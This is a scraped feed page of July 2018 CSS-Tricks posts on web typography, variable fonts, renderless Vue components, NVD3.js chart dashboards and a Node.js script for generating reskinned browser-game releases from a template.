Web Standards

Your Body Text is Too Small

Css Tricks - Fri, 07/20/2018 - 5:37pm

Several years ago, there was a big push by designers to increase the font-size of websites and I feel like we’re living in another era of accessibility improvements where a fresh batch of designers are pushing for even larger text sizing today. Take this post by Christian Miller, for example, where he writes:

The majority of websites are still anywhere in the range of 15–18px. We’re starting to see some sites adopt larger body text at around 20px or even greater on smaller desktop displays, but not enough in my opinion.

Christian attributes this to all sorts of different things, but I particularly like this bit:

Unfortunately, it’s a common mistake to purposefully design a website in a way to avoid scrolling. To the detriment of design, body text size is reduced to either reduce scrolling, or condense the layout in order to fit other elements in and around the copy.

Scrolling is a natural, established pattern on the web—people expect to have to scroll. Even when it isn’t possible, people will attempt scrolling to see if a page offers more beyond what’s initially in the viewport. Readability is more important than the amount of scrolling required—good content won’t prevent users from scrolling.

I would only push back a little bit on the advice — that legibility isn’t always tied to the font-size of a block of text. A lot of the time it has to do with contrast instead — whether the typeface is easy to read and whether it is clearly visible against the background. Overall, though, there’s a lot of great advice for designers both new and old in this post.

Direct Link to ArticlePermalink

The post Your Body Text is Too Small appeared first on CSS-Tricks.

Font Playground

Css Tricks - Fri, 07/20/2018 - 9:29am

This is a wondrous little project by Wenting Zhang that showcases a series of variable fonts and lets you manipulate their settings to see the results. It’s interesting that there’s so many tools like this that have been released over the past couple of months, such as v-fonts, Axis-Praxis and Wakamai Fondue just to name a few.

Direct Link to ArticlePermalink

The post Font Playground appeared first on CSS-Tricks.

Weird things variable fonts can do

Css Tricks - Fri, 07/20/2018 - 9:28am

I tend to think of variable fonts as a font format in which a single font file is capable of displaying type at near-infinite variations of things like boldness, width, and slantyness. In my experience, that's a common use case. Just check out many of the interactive demos over at Axis-Praxis:


Make sure to go play around at v-fonts.com as well for loads of variable font demonstrations.

But things like boldness, width, and slantyness and just a few of the attributes that a type designer might want to make controllable. There are no rules that say you have to make boldness a controllable attribute. Literally, anything is possible, and people have been experimenting with that quite a bit.

If you're interested in variable fonts, we have a whole guide with all the best articles we've published on the subject.

Here's some, ahem, weirder things that variable fonts can do.

A variable font can change its own serifyness

A typical job for a variable font is changing weight/width/slant... but it really can be _anything_.

Foreday is a font where you can change it's serifyness(1).https://t.co/t4soiQaYqH

(1) real word now ok. pic.twitter.com/5X0oGauUbf

— Chris Coyier (@chriscoyier) April 24, 2018

A variable font can be used for animation

Kind of like sprite sheet animation!

Y'all seem to be pretty into ➡️ variable fonts doing weird things ⬅️ so here's another mind-blower. pic.twitter.com/U2ok2tR6r8

— Chris Coyier (@chriscoyier) May 3, 2018

Toshi Omagari has made a number of absolutely bananas demos, including stuff like this pixelated video, which straight up breaks my brain:

A variable font can adjust its own attributes on three different axes

Another variable font thing that's pretty 😲 https://t.co/dzp92UxXqX pic.twitter.com/1mLxIhqoVR

— Chris Coyier (@chriscoyier) May 2, 2018

A variable font can change the hat on some poop

I hope you don't mind me tootin' my own horn, but there's also the glorious pioneering work of a variable color font called... Mr. Poo: https://t.co/aE2qWE69Cm pic.twitter.com/X3ylXzqtnT

— Roel Nieskens (@pixelambacht) May 8, 2018

A variable font can make the grass grow

This is a demo by Mandy Michael using Decovar, a "multistyle decorative variable font" by David Berlow.

See the Pen Grassy Text with Variable fonts. by Mandy Michael (@mandymichael) on CodePen.

Decovar is weird.

A variable font can make blood drip

This one is called Krabat by Josefína Karlíková:

There are loads of cool ones on The Next Big Thing in Type to check out. Here's another awesome one:

Variable fonts are a ripe field for experimentation!

The post Weird things variable fonts can do appeared first on CSS-Tricks.

Building “Renderless” Vue Components

Css Tricks - Fri, 07/20/2018 - 4:00am

There's this popular analogy of Vue that goes like this: Vue is what you get when React and Angular come together and make a baby. I've always shared this feeling. With Vue’s small learning curve, it's no wonder so many people love it. Since Vue tries to give the developer power over components and their implementation as much as it possibly can, this sentiment has led to today's topic.

The term renderless components refers to components that don’t render anything. In this article, we'll cover how Vue handles the rendering of a component.

We'll also see how we can use the render() function to build renderless components.

You may want to know a little about Vue to get the most out of this article. If you are a newbie Sarah Drasner's got your back. The official documentation is also a very good resource.

Demystifying How Vue Renders a Component

Vue has quite a few ways of defining a component's markup. There's:

  • Single file components that let us define components and their markup like we would a normal HTML file.
  • The template component property which allows us to use JavaScript's template literals to define the markup for our component.
  • The el component property tells Vue to query the DOM for a markup to use as the template.

You've probably heard the (possibly rather annoying): at the end of the day, Vue and all its components are just JavaScript. I could see why you may think that statement is wrong with the amount of HTML and CSS we write. Case and point: single file components.

With single file components, we can define a Vue component like this:

<template> <div class="mood"> {{ todayIsSunny ? 'Makes me happy' : 'Eh! Doesn't bother me' }} </div> </template> <script> export default { data: () => ({ todayIsSunny: true }) } </script> <style> .mood:after { content: '&#x1f389;&#x1f389;'; } </style>

How can we say Vue is "just JavaScript" with all of that gobbledygook above? But, at the end of the day, it is. Vue does try to make it easy for our views to manage their styling and other assets, but Vue doesn't directly do that — it leaves it up to the build process, which is probably webpack.

When webpack encounters a .vue file, it'll run it through a transform process. During this process, the CSS is extracted from the component and placed in its own file, and the remaining contents of the file get transformed into JavaScript. Something like this:

export default { template: ` <div class="mood"> {{ todayIsSunny ? 'Makes me happy' : 'Eh! Doesn't bother me' }} </div>`, data: () => ({ todayIsSunny: true }) }

Well... not quite what we have above. To understand what happens next, we need to talk about the template compiler.

The Template Compiler and the Render Function

This part of a Vue component’s build process is necessary for compiling and running every optimization technique Vue currently implements.

When the template compiler encounters this:

{ template: `<div class="mood">...</div>`, data: () => ({ todayIsSunny: true }) }

...it extracts the template property and compiles its content into JavaScript. A render function is then added to the component object. This render function will, in turn, return the extracted template property content that was converted into JavaScript.

This is what the template above will look like as a render function:

... render(h) { return h( 'div', { class: 'mood' }, this.todayIsSunny ? 'Makes me happy' : 'Eh! Doesn't bother me' ) } ...

Refer to the official documentation to learn more about the render function.

Now, when the component object gets passed to Vue, the render function of the component goes through some optimizations and becomes a VNode (virtual node). VNode is what gets passed into snabbdom (the library Vue uses internally to manage the virtual DOM). Sarah Drasner does a good job explaining the "h" in the render function above.

A VNode is how Vue renders components. By the way, the render function also allows us to use JSX in Vue!

We also don’t have to wait for Vue to add the render function for us — we can define a render function and it should take precedence over el or the template property. Read here to learn about the render function and its options.

By building your Vue components with Vue CLI or some custom build process, you don't have to import the template compiler which can bloat your build file size. Your components are also pre-optimized for a brilliant performance and really lightweight JavaScript files.

So... Renderless Vue Components

Like I mentioned, the term renderless components means components that don’t render anything. Why would we want components that don't render anything?

We can chalk it up to creating an abstraction of common component functionality as its own component and extending said component to create better and even more robust components. Also, S.O.L.I.D.

According to the Single responsibility principle of S.O.L.I.D.:

A class should only have one purpose.

We can port over that concept into Vue development by making each component have only one responsibility.

You may be like Nicky and, "pfft, yeah I know." Okay, sure! Your component may have the name "password-input" and it surely renders a password input. The problem with this approach is that when you want to reuse this component in another project, you may have to go into the component’s source to modify the style or the markup to keep in line with the new project’s style guide.

This breaks a rule of S.O.L.I.D. known as the open-closed principle which states that:

A class or a component, in this case, should be open for extension, but closed for modification.

This is saying that instead of editing the component's source, you should be able to extend it.

Since Vue understands S.O.L.I.D. principles, it lets components have props, events, slots, and scoped slots which makes communication and extension of a component a breeze. We can then build components that have all the features, without any of the styling or markup. Which is really great for re-usability and efficient code.

Build a "Toggle" Renderless Component

This will be simple. No need to set up a Vue CLI project.

The Toggle component will let you toggle between on and off states. It'll also provide helpers that let you do that. It's useful for building components like, well, on/off components such as custom checkboxes and any components that need an on/off state.

Let's quickly stub our component: Head to the JavaScript section of a CodePen pen and follow along.

// toggle.js const toggle = { props: { on: { type: Boolean, default: false } }, render() { return [] }, data() { return { currentState: this.on } }, methods: { setOn() { this.currentState = true }, setOff() { this.currentState = false }, toggle() { this.currentState = !this.currentState } } }

This is pretty minimal and not yet complete. It needs a template, and since we don't want this component to render anything, we have to make sure it works with any component that does.

Cue the slots!

Slots in Renderless Components

Slots allow us to place content between the opening and close tags of a Vue component. Like this:

<toggle> This entire area is a slot. </toggle>

In Vue's single file components, we could do this to define a slot:

<template> <div> <slot/> </div> </template>

Well, to do that using a render() function, we can:

// toggle.js render() { return this.$slots.default }

We can automatically place stuff within our toggle component. No markup, nothing.

Sending Data up the Tree with Scoped Slots

In toggle.js, we had some on state and some helper functions in the methods object. It’d be nice if we could give the developer access to them. We are currently using slots and they don’t let us expose anything from the child component.

What we want is scoped slots. Scoped slots work exactly like slots with the added advantage of a component having a scoped slot being able to expose data without firing events.

We can do this:

<toggle> <div slot-scope="{ on }"> {{ on ? 'On' : 'Off' }} </div> </toggle>

That slot-scope attribute you can see on the div is de-structuring an object exposed from the toggle component.

Going back to the render() function, we can do:

render() { return this.$scopedSlots.default({}) }

This time around, we are calling the default property on the $scopedSlots object as a method because scoped slots are methods that take an argument. In this case, the method's name is default since the scoped slot wasn't given a name and it's the only scoped slot that exists. The argument we pass to a scoped slot can then be exposed from the component. In our case, let’s expose the current state of on and the helpers to help manipulate that state.

render() { return this.$scopedSlots.default({ on: this.currentState, setOn: this.setOn, setOff: this.setOff, toggle: this.toggle, }) } Using the Toggle Component

We can do this all in CodePen. Here is what we’re building:

See the Pen ZRaYWm by Samuel Oloruntoba (@kayandrae07) on CodePen.

Here’s the markup in action:

<div id="app"> <toggle> <div slot-scope="{ on, setOn, setOff }" class="container"> <button @click="click(setOn)" class="button">Blue pill</button> <button @click="click(setOff)" class="button isRed">Red pill</button> <div v-if="buttonPressed" class="message"> <span v-if="on">It's all a dream, go back to sleep.</span> <span v-else>I don't know how far the rabbit hole goes, I'm not a rabbit, neither do I measure holes.</span> </div> </div> </toggle> </div>
  1. First, we are de-structuring the state and helpers from the scoped slot.
  2. Then, within the scoped slot, we created two buttons, one to toggle current state on and the other off.
  3. The click method is just there to make sure a button was actually pressed before we display a result. You can check out the click method below.
new Vue({ el: '#app', components: { toggle }, data: { buttonPressed: false, }, methods: { click(fn) { this.buttonPressed = true fn() }, }, })

We can still pass props and fire events from the Toggle component. Using a scoped slot changes nothing.

new Vue({ el: '#app', components: { toggle }, data: { buttonPressed: false, }, methods: { click(fn) { this.buttonPressed = true fn() }, }, })

This is a basic example, but we can see how powerful this can get when we start building components like a date picker or an autocomplete widget. We can reuse these components across multiple projects without having to worry about those pesky stylesheets getting in the way.

One more thing we can do is expose the attributes needed for accessibility from the scoped slot and also don’t have to worry about making components that extend this component accessible.

In Summary
  • A component’s render function is incredibly powerful.
  • Build your Vue components for a faster run-time.
  • Component’s el, template or even single file components all get compiled into render functions.
  • Try to build smaller components for more reusable code.
  • Your code need not be S.O.L.I.D., but it’s a damn good methodology to code by.

The post Building “Renderless” Vue Components appeared first on CSS-Tricks.

CSS: A New Kind of JavaScript

Css Tricks - Thu, 07/19/2018 - 10:37am

In this wacky and satirical post, Heydon Pickering describes a wild new technology called Cascading Style Sheets that solves a lot of the problems you might bump into when styling things with JavaScript:

A good sign that a technology is not fit for purpose is how much we have to rely on workarounds and best practices to get by. Another sign is just how much code we have to write in order to get simple things done. When it comes to styling, JavaScript is that technology.

CSS solves JavaScript’s styling problems, and elegantly. The question is: are you willing to embrace the change, or are you married to an inferior methodology?

Yes, this is a funny post but the topic of CSS-in-JS is hot and quite active. We recently shared a video of Bruce Lawson's excellent talk on the subject and published a roundup of chatter about it as it relates to React. Chris also linked the conversation back to the age-old question of how we deal with unused CSS.

Direct Link to ArticlePermalink

The post CSS: A New Kind of JavaScript appeared first on CSS-Tricks.

Accessibility for Teams

Css Tricks - Thu, 07/19/2018 - 10:37am

Maya Benari:

Accessibility is a crucial part of government product design. First, it’s the law. Federal agencies face legal consequences when they don’t meet accessibility requirements. Second, it affects us all. Whether you have a motor disability, you sprained your wrist playing dodgeball, you need a building to have a ramp for your wheelchair or stroller, or you literally just have your hands full, we all find ourselves unable to do certain things at different points in our lives. Accessible products are better products for everyone.

But accessibility is hard: It comes across as a set of complex rules that are hard to follow. Not everyone feels confident that they’re doing it right. It’s difficult to prioritize alongside other work and project needs. How do you make sure you’re building products that are accessible and inclusive?

So they set about building a guide and did a heck of a job. This is 18F work, the same team that did the U.S. Web Design System (see video presentation).

Direct Link to ArticlePermalink

The post Accessibility for Teams appeared first on CSS-Tricks.

How to make a modern dashboard with NVD3.js

Css Tricks - Thu, 07/19/2018 - 3:58am

NVD3.js is a JavaScript visualization library that is free to use and open source. It’s derived from the well-known d3.js visualization library. When used the right way, this library can be extremely powerful for everyday tasks and even business operations.

For example, an online dashboard. We can use NVD3.js to compile data into a centralized space that visualizes the information in neat charts and graphs. That’s what we’re going to look at in this post.

Making a dashboard with NVD3.js for the first time is daunting, but after this tutorial, you should have the required knowledge to get your hands dirty and start building something awesome. Personally, I have a passion for visualizations on the web. They are both beautiful and meaningful at the same time.

Real-world use case: A data dashboard

Dashboards can be used for pretty much anything. As long as you've got data to analyze, you’re good to go, whether that be some sales data or the average weather for the last 20 years. Let’s build something like this:

See the Pen Dashboard NVD3.JS by Danny Englishby (@DanEnglishby) on CodePen.

Setting up the environment

To setup an NVD3 chart, we require three things:

  1. The NVD3 JavaScript library
  2. The NVD3 CSS library
  3. The D3.js library (a dependency for NVD3)

All of these are available through Cloudflare's CDN network. Here’s an HTML template with all those resources ready to go:

<!doctype html> <html lang="en"> <head> <meta charset="utf-8"> <title>Making a Dashboard</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/nvd3/1.8.6/nv.d3.css"> </head> <body> <script src="https://cdnjs.cloudflare.com/ajax/libs/d3/3.5.2/d3.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/nvd3/1.8.6/nv.d3.js"></script> </body> </html> Data sources

For this tutorial, I thought using some raw, factual data that’s already been formatted into JSON would be easiest. I’m using two sources of information: one about global average temperatures over time and the other reporting world population statistics. I've already formatted the data into JSON, so it's ready to copy and paste!

Creating a line chart

Let’s go ahead and create a line chart with some global temperature data. The raw data I've put together in JSON represents the last twenty years of temperature changes compared to the global average.

First, we’ll add a placeholder element for the chart to attach to when the JavaScript is executed.

<div id="averageDegreesLineChart" class='with-3d-shadow with-transitions averageDegreesLineChart'> <svg></svg> </div>

Then add the following JSON in some script tags before the </body> tag:

var temperatureIndexJSON = [ { key: "Temp +- Avg.", values: [{ "x": 1998, "y": 0.45 }, { "x": 1999, "y": 0.48 }, { "x": 2000, "y": 0.5 }, { "x": 2001, "y": 0.52 }, { "x": 2002, "y": 0.55 }, { "x": 2003, "y": 0.58 }, { "x": 2004, "y": 0.6 }, { "x": 2005, "y": 0.61 }, { "x": 2006, "y": 0.61 }, { "x": 2007, "y": 0.61 }, { "x": 2008, "y": 0.62 }, { "x": 2009, "y": 0.62 }, { "x": 2010, "y": 0.62 }, { "x": 2011, "y": 0.63 }, { "x": 2012, "y": 0.67 }, { "x": 2013, "y": 0.71 }, { "x": 2014, "y": 0.77 }, { "x": 2015, "y": 0.83 }, { "x": 2016, "y": 0.89 }, { "x": 2017, "y": 0.95 }] } ];

The x value is the year and they value is the temperature in Celsius degrees.

The last piece to the puzzle is the most important function that creates the chart. The function named nv.addGraph() is the main function used throughout NVD3 and, within it, you initialize the chart object. In this example, we are using the lineChart object which can have methods chained to it, depending on what the visual requirements may be.

Check out the JavaScript comments to see the which each line does.

nv.addGraph(function () { var chart = nv.models.lineChart() // Initialise the lineChart object. .useInteractiveGuideline(true); // Turn on interactive guideline (tooltips) chart.xAxis .axisLabel('TimeStamp (Year)'); // Set the label of the xAxis (Vertical) chart.yAxis .axisLabel('Degrees (c)') // Set the label of the xAxis (Horizontal) .tickFormat(d3.format('.02f')); // Rounded Numbers Format. d3.select('#averageDegreesLineChart svg') // Select the ID of the html element we defined earlier. .datum(temperatureIndexJSON) // Pass in the JSON .transition().duration(500) // Set transition speed .call(chart); // Call & Render the chart nv.utils.windowResize(chart.update); // Intitiate listener for window resize so the chart responds and changes width. return; });

See the Pen Line Chart NVD3.JS by Danny Englishby (@DanEnglishby) on CodePen.

Creating two bar charts for the price of one

You will love the minimal effort of these next two charts. The power of NVD3.js enables switching between chart types. You can either have the toggle active so users can switch between a standard bar chart or a stacked bar chart. Or you can force the chart type and make it unchangeable.

The following examples show exactly how to do it.

Stacked multi-bar chart

You know those bar charts that stack two values together in the same bar? That’s what we’re doing here.

<div id="worldPopulationMultiBar" class="with-3d-shadow with-transitions worldPopulationMultiBar"> <svg></svg> </div> var populationBySexAndCountryJSON =[{"key":"Male","color":"#d62728","values":[{"label":"China","value":717723466.166},{"label":"India","value":647356171.132},{"label":"United States of America","value":157464952.272},{"label":"Indonesia","value":125682412.393},{"label":"Brazil","value":98578067.1},{"label":"Pakistan","value":93621293.316},{"label":"Nigeria","value":88370210.605},{"label":"Bangladesh","value":79237050.772},{"label":"Russian Federation","value":65846330.629},{"label":"Japan","value":61918921.999}]},{"key":"Female","color":"#1f77b4","values":[{"label":"China","value":667843070.834},{"label":"India","value":604783424.868},{"label":"United States of America","value":162585763.728},{"label":"Indonesia","value":124183218.607},{"label":"Brazil","value":101783857.9},{"label":"Pakistan","value":88521300.684},{"label":"Nigeria","value":85245134.395},{"label":"Bangladesh","value":77357911.228},{"label":"Russian Federation","value":76987358.371},{"label":"Japan","value":65224655.001}]}]; nv.addGraph(function () { var chart = nv.models.multiBarChart() .x(function (d) { return d.label; // Configure x axis to use the "label" within the json. }) .y(function (d) { return d.value; // Configure y axis to use the "value" within the json. }).margin({top: 30, right: 20, bottom: 50, left: 85}) // Add some CSS Margin to the chart. .showControls(false) // Turn of switchable control .stacked(true); // Force stacked mode. chart.xAxis.axisLabel('Countries'); // add label to the horizontal axis chart.yAxis.tickFormat(d3.format('0f')); // Round the yAxis values d3.select('#worldPopulationMultiBar svg') // Select the html element by ID .datum(populationBySexAndCountryJSON) // Pass in the data .transition().duration(500) // Set transition speed .call(chart); // Call & Render chart nv.utils.windowResize(chart.update); // Intitiate listener for window resize so the chart responds and changes width. return; });

The two important settings in the JavaScript here are the .showControls and .stacked booleans. They both do what they say on the tin: force the graph to a stacked bar chart and don't allow switching of the chart type. You will see what I mean by switching soon.

See the Pen Multi StackedBar NVD3.JS by Danny Englishby (@DanEnglishby) on CodePen.

Standard multi-bar chart

Now, let’s do something a little more traditional and compare values side-by-side instead of stacking them in the same bar.

This uses pretty much the same code as the stacked examples, but we can change the .stacked boolean value to false. This will, of course, make the stacked bar chart a normal bar chart.

<div id="worldPopulationMultiBar" class="with-3d-shadow with-transitions worldPopulationMultiBar"> <svg></svg> </div> var populationBySexAndCountryJSON = [{"key":"Male","color":"#d62728","values":[{"label":"China","value":717723466.166},{"label":"India","value":647356171.132},{"label":"United States of America","value":157464952.272},{"label":"Indonesia","value":125682412.393},{"label":"Brazil","value":98578067.1},{"label":"Pakistan","value":93621293.316},{"label":"Nigeria","value":88370210.605},{"label":"Bangladesh","value":79237050.772},{"label":"Russian Federation","value":65846330.629},{"label":"Japan","value":61918921.999}]},{"key":"Female","color":"#1f77b4","values":[{"label":"China","value":667843070.834},{"label":"India","value":604783424.868},{"label":"United States of America","value":162585763.728},{"label":"Indonesia","value":124183218.607},{"label":"Brazil","value":101783857.9},{"label":"Pakistan","value":88521300.684},{"label":"Nigeria","value":85245134.395},{"label":"Bangladesh","value":77357911.228},{"label":"Russian Federation","value":76987358.371},{"label":"Japan","value":65224655.001}]}]; nv.addGraph(function () { var chart = nv.models.multiBarChart() .x(function (d) { return d.label; // Configure x axis to use the "label" within the json. }) .y(function (d) { return d.value; // Configure y axis to use the "value" within the json. }).margin({top: 30, right: 20, bottom: 50, left: 85}) // Add some CSS Margin to the chart. .showControls(false) // Turn of switchable control .stacked(false); // ***Force normal bar mode.*** chart.xAxis.axisLabel('Countries'); // add label to the horizontal axis chart.yAxis.tickFormat(d3.format('0f')); // Round the yAxis values d3.select('#worldPopulationMultiBar svg') // Select the html element by ID .datum(populationBySexAndCountryJSON) // Pass in the data .transition().duration(500) // Set transition speed .call(chart); // Call & Render chart nv.utils.windowResize(chart.update); // Intitiate listener for window resize so the chart responds and changes width. return; });

The one change to the settings presents us with a brand-new looking chart.

See the Pen Multi Bar NVD3.JS by Danny Englishby (@DanEnglishby) on CodePen.

Using one code set with minimal changes, you just created two epic charts for the price of one. Kudos for you!

There is one last setting, of course, if you want the functionality of switching charts. Change the .showControls to true and remove the .stacked option. You will notice some controls at the top of the chart. Clicking them will toggle the view between a stacked and standard chart.

See the Pen Multi Bar Switchable NVD3.JS by Danny Englishby (@DanEnglishby) on CodePen.

Making a dashboard

There's nothing I love looking at more in the world of web development than dashboards. They never get old and are super good looking. By using the charting techniques we’ve already covered, we can make our own responsive dashboard on a single webpage.

If you remember within the JavaScript snippets earlier, there was a function set with a listener against each chart: nv.utils.windowResize(chart.update);

This magical function, resizes the chart for you as if it was set to width: 100% in CSS. But it doesn't just shrink, but also moves and restructures the graph according to the size of the screen. It's pretty awesome! All we need to worry about it are the heights. We can set this up by applying flexbox to the classes assigned to chart elements.

Let’s bundle everything we have so far into one dashboard by wrapping each chart element in a flexbox container. Apply a small amount of CSS for the flexing and height, and finally, compile all the scripts into one (or, you can keep them separate in your own project).

See the Pen Dashboard NVD3.JS by Danny Englishby (@DanEnglishby) on CodePen.


This tutorial will hopefully give you the knowledge to get started with building data visualizations and, ultimately, add them into a production dashboard. Even if you only want to play with these concepts, I'm sure your mind will start running with ideas for how to transform different types of data into stunning visuals.

The post How to make a modern dashboard with NVD3.js appeared first on CSS-Tricks.

?The State of Headless CMS Market

Css Tricks - Thu, 07/19/2018 - 3:53am

(This is a sponsored post.)

In March and April 2018, Kentico conducted the first global report about the state of headless CMS market. We surveyed 986 CMS practitioners in 85 countries about their opinions, adoption, and plans for using headless CMS. The survey contains valuable industry insights into topics such headless CMS awareness, preferred headless CMS models, current and future uptake of the headless CMS approach, and much more, from leading industry players.

Download your complimentary copy of the full report now.

Direct Link to ArticlePermalink

The post ?The State of Headless CMS Market appeared first on CSS-Tricks.

What bit of advice would you share with someone new to your field?

Css Tricks - Wed, 07/18/2018 - 4:17am

The most FA of all the FAQs.

Here's Laura Kalbag:

Find what you love. Don’t worry about needing to learn every language, technique or tool. Start with what interests you, and carve your own niche. And then use your powers for good!

And my own:

Buy a domain name. Figure out how to put an HTML file up there. Isn’t that a powerful feeling? Now you’ve got table stakes. Build something.

Definitely, go read other A Book Apart author answers because they are all great. My other favorite is just three words.

Direct Link to ArticlePermalink

The post What bit of advice would you share with someone new to your field? appeared first on CSS-Tricks.

Automate Your Workflow with Node

Css Tricks - Wed, 07/18/2018 - 4:07am

You know those tedious tasks you have to do at work: Updating configuration files, copying and pasting files, updating Jira tickets.

Time adds up after a while. This was very much the case when I worked for an online games company back in 2016. The job could be very rewarding at times when I had to build configurable templates for games, but about 70% of my time was spent on making copies of those templates and deploying re-skinned implementations.

What is a reskin?

The definition of a reskin at the company was using the same game mechanics, screens and positioning of elements, but changing the visual aesthetics such as color and assets. So in the context of a simple game like ‘Rock Paper Scissors,’ we would create a template with basic assets like below.

But when we create a reskin of this, we would use different assets and the game would still work. If you look at games like Candy Crush or Angry Birds, you’ll find that they have many varieties of the same game. Usually Halloween, Christmas or Easter releases. From a business perspective it makes perfect sense.

Now… back to our implementation. Each of our games would share the same bundled JavaScript file, and load in a JSON file that had different content and asset paths. The result?

The good thing about extracting configurable values into a JSON file is that you can modify the properties without having to recompile/build the game again. Using Node.js and the original breakout game created by Mozilla, we will make a very simple example of how you can create a configurable template, and make releases from it by using the command line.

Our game

This is the game we’ll be making. Reskins of MDN Breakout, based on the existing source code.

Gameplay screen from the game MDN Breakout where you can use your paddle to bounce the ball and destroy the brick field, with keeping the score and lives.

The primary color will paint the text, paddle, ball and blocks, and the secondary color will paint the background. We will proceed with an example of a dark blue background and a light sky blue for the foreground objects.


You will need to ensure the following:

We have tweaked the original Firefox implementation so that we first read in the JSON file and then build the game using HTML Canvas. The game will read in a primary color, and a secondary color from our game.json file.

{ "primaryColor": "#fff", "secondaryColor": "#000" }

We will be using example 20 from the book Automating with Node.js. The source code can be found here.

Open up a new command line (CMD for Windows, Terminal for Unix-like Operating systems) and change into the following directory once you have cloned the repository locally.

$ cd nobot-examples/examples/020

Remember the game server should be running in a separate terminal.

Our JSON file sits beside an index.html file inside a directory called template. This is the directory that we will copy from whenever we want to do a new release/copy.

<!DOCTYPE html> <html> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Paddle Game</title> <style> * { padding: 0; margin: 0; } canvas { background: #eee; display: block; margin: 0 auto; } </style> </head> <body> <canvas id="game" width="480" height="320"></canvas> <script type="text/javascript" src="../../core/game-1.0.0.js"></script> </body> </html>

You see above that every game we release will point to the same core bundle JavaScript file. Let’s have a look at our JavaScript implementation under the core directory.

Don’t look too much into the mechanics of how the game works, more so how we inject values into the game to make it configurable.

(function boot(document) { function runGame(config) { const canvas = document.getElementById('game'); canvas.style.backgroundColor = config.secondaryColor; // rest of game source code gets executed... hidden for brevity // source can be found here: https://git.io/vh1Te } function loadConfig() { fetch('game.json') .then(response => response.json()) .then(runGame); } document.addEventListener('DOMContentLoaded', () => { loadConfig(); }); }(document));

The source code is using ES6 features and may not work in older browsers. Run through Babel if this is a problem for you.

You can see that we are waiting for the DOM content to load, and then we are invoking a method called loadConfig. This is going to make an AJAX request to game.json, fetch our JSON values, and once it has retrieved them, it will initiate the game and assign the styles in the source code.

Here is an example of the configuration setting the background color.

const canvas = document.getElementById('game'); canvas.style.backgroundColor = config.secondaryColor; // overriding color here

So, now that we have a template that can be configurable, we can move on to creating a Node.js script that will allow the user to either pass the name of the game and the colors as options to our new script, or will prompt the user for: the name of the game, the primary color, and then the secondary color. Our script will enforce validation to make sure that both colors are in the format of a hex code (e.g. #101b6b).

When we want to create a new game reskin, we should be able to run this command to generate it:

$ node new-reskin.js --gameName='blue-reskin' --gamePrimaryColor='#76cad8' --gameSecondaryColor='#10496b'

The command above will build the game immediately, because it has the three values it needs to release the reskin.

We will create this script new-reskin.js, and this file carries out the following steps:

  1. It will read in the options passed in the command line and store them as variables. Options can be read in by looking in the process object (process.argv).
  2. It will validate the values making sure that the game name, and the colors are not undefined.
  3. If there are any validation issues, it will prompt the user to re-enter it correctly before proceeding.
  4. Now that it has the values, it will make a copy of the template directory and place a copy of it into the releases directory and name the new directory with the name of the game we gave it.
  5. It will then read the JSON file just recently created under the releases directory and override the values with the values we passed (the colors).
  6. At the end, it will prompt the user to see if they would like to open the game in a browser. It adds some convenience, rather than us trying to remember what the URL is.

Here is the full script. We will walk through it afterwards.

require('colors'); const argv = require('minimist')(process.argv.slice(2)); const path = require('path'); const readLineSync = require('readline-sync'); const fse = require('fs-extra'); const open = require('opn'); const GAME_JSON_FILENAME = 'game.json'; let { gameName, gamePrimaryColor, gameSecondaryColor } = argv; if (gameName === undefined) { gameName = readLineSync.question('What is the name of the new reskin? ', { limit: input => input.trim().length > 0, limitMessage: 'The project has to have a name, try again' }); } const confirmColorInput = (color, colorType = 'primary') => { const hexColorRegex = /^#([A-Fa-f0-9]{6}|[A-Fa-f0-9]{3})$/; if (hexColorRegex.test(color)) { return color; } return readLineSync.question(`Enter a Hex Code for the game ${colorType} color `, { limit: hexColorRegex, limitMessage: 'Enter a valid hex code: #efefef' }); }; gamePrimaryColor = confirmColorInput(gamePrimaryColor, 'primary'); gameSecondaryColor = confirmColorInput(gameSecondaryColor, 'secondary'); console.log(`Creating a new reskin '${gameName}' with skin color: Primary: '${gamePrimaryColor}' Secondary: '${gameSecondaryColor}'`); const src = path.join(__dirname, 'template'); const destination = path.join(__dirname, 'releases', gameName); const configurationFilePath = path.join(destination, GAME_JSON_FILENAME); const projectToOpen = path.join('http://localhost:8080', 'releases', gameName, 'index.html'); fse.copy(src, destination) .then(() => { console.log(`Successfully created ${destination}`.green); return fse.readJson(configurationFilePath); }) .then((config) => { const newConfig = config; newConfig.primaryColor = gamePrimaryColor; newConfig.secondaryColor = gameSecondaryColor; return fse.writeJson(configurationFilePath, newConfig); }) .then(() => { console.log(`Updated configuration file ${configurationFilePath}`green); openGameIfAgreed(projectToOpen); }) .catch(console.error); const openGameIfAgreed = (fileToOpen) => { const isOpeningGame = readLineSync.keyInYN('Would you like to open the game? '); if (isOpeningGame) { open(fileToOpen); } };

At the top of the script, we require the packages needed to carry out the process.

  • colors to be used to signify success or failure using green or red text.
  • minimist to make it easier to pass arguments to our script and to parse them optionally. Pass input without being prompted to enter.
  • path to construct paths to the template and the destination of the new game.
  • readline-sync to prompt user for information if it's missing.
  • fs-extra so we can copy and paste our game template. An extension of the native fs module.
  • opn is a library that is cross platform and will open up our game in a browser upon completion.

The majority of the modules above would’ve been downloaded/installed when you ran npm install in the root of the nobot-examples repository. The rest are native to Node.

We check if the game name was passed as an option through the command line, and if it hasn’t been, we prompt the user for it.

// name of our JSON file. We store it as a constant const GAME_JSON_FILENAME = 'game.json'; // Retrieved from the command line --gameName='my-game' etc. let { gameName, gamePrimaryColor, gameSecondaryColor } = argv; // was the gameName passed? if (gameName === undefined) { gameName = readLineSync.question('What is the name of the new reskin? ', { limit: input => input.trim().length > 0, limitMessage: 'The project has to have a name, try again' }); }

Because two of our values need to be hex codes, we create a function that can do the check for both colors: the primary and the secondary. If the color supplied by the user does not pass our validation, we prompt for the color until it does.

// Does the color passed in meet our validation requirements? const confirmColorInput = (color, colorType = 'primary') => { const hexColorRegex = /^#([A-Fa-f0-9]{6}|[A-Fa-f0-9]{3})$/; if (hexColorRegex.test(color)) { return color; } return readLineSync.question(`Enter a Hex Code for the game ${colorType} color `, { limit: hexColorRegex, limitMessage: 'Enter a valid hex code: #efefef' }); };

We use the function above to obtain both the primary and secondary colors.

gamePrimaryColor = confirmColorInput(gamePrimaryColor, 'primary'); gameSecondaryColor = confirmColorInput(gameSecondaryColor, 'secondary');

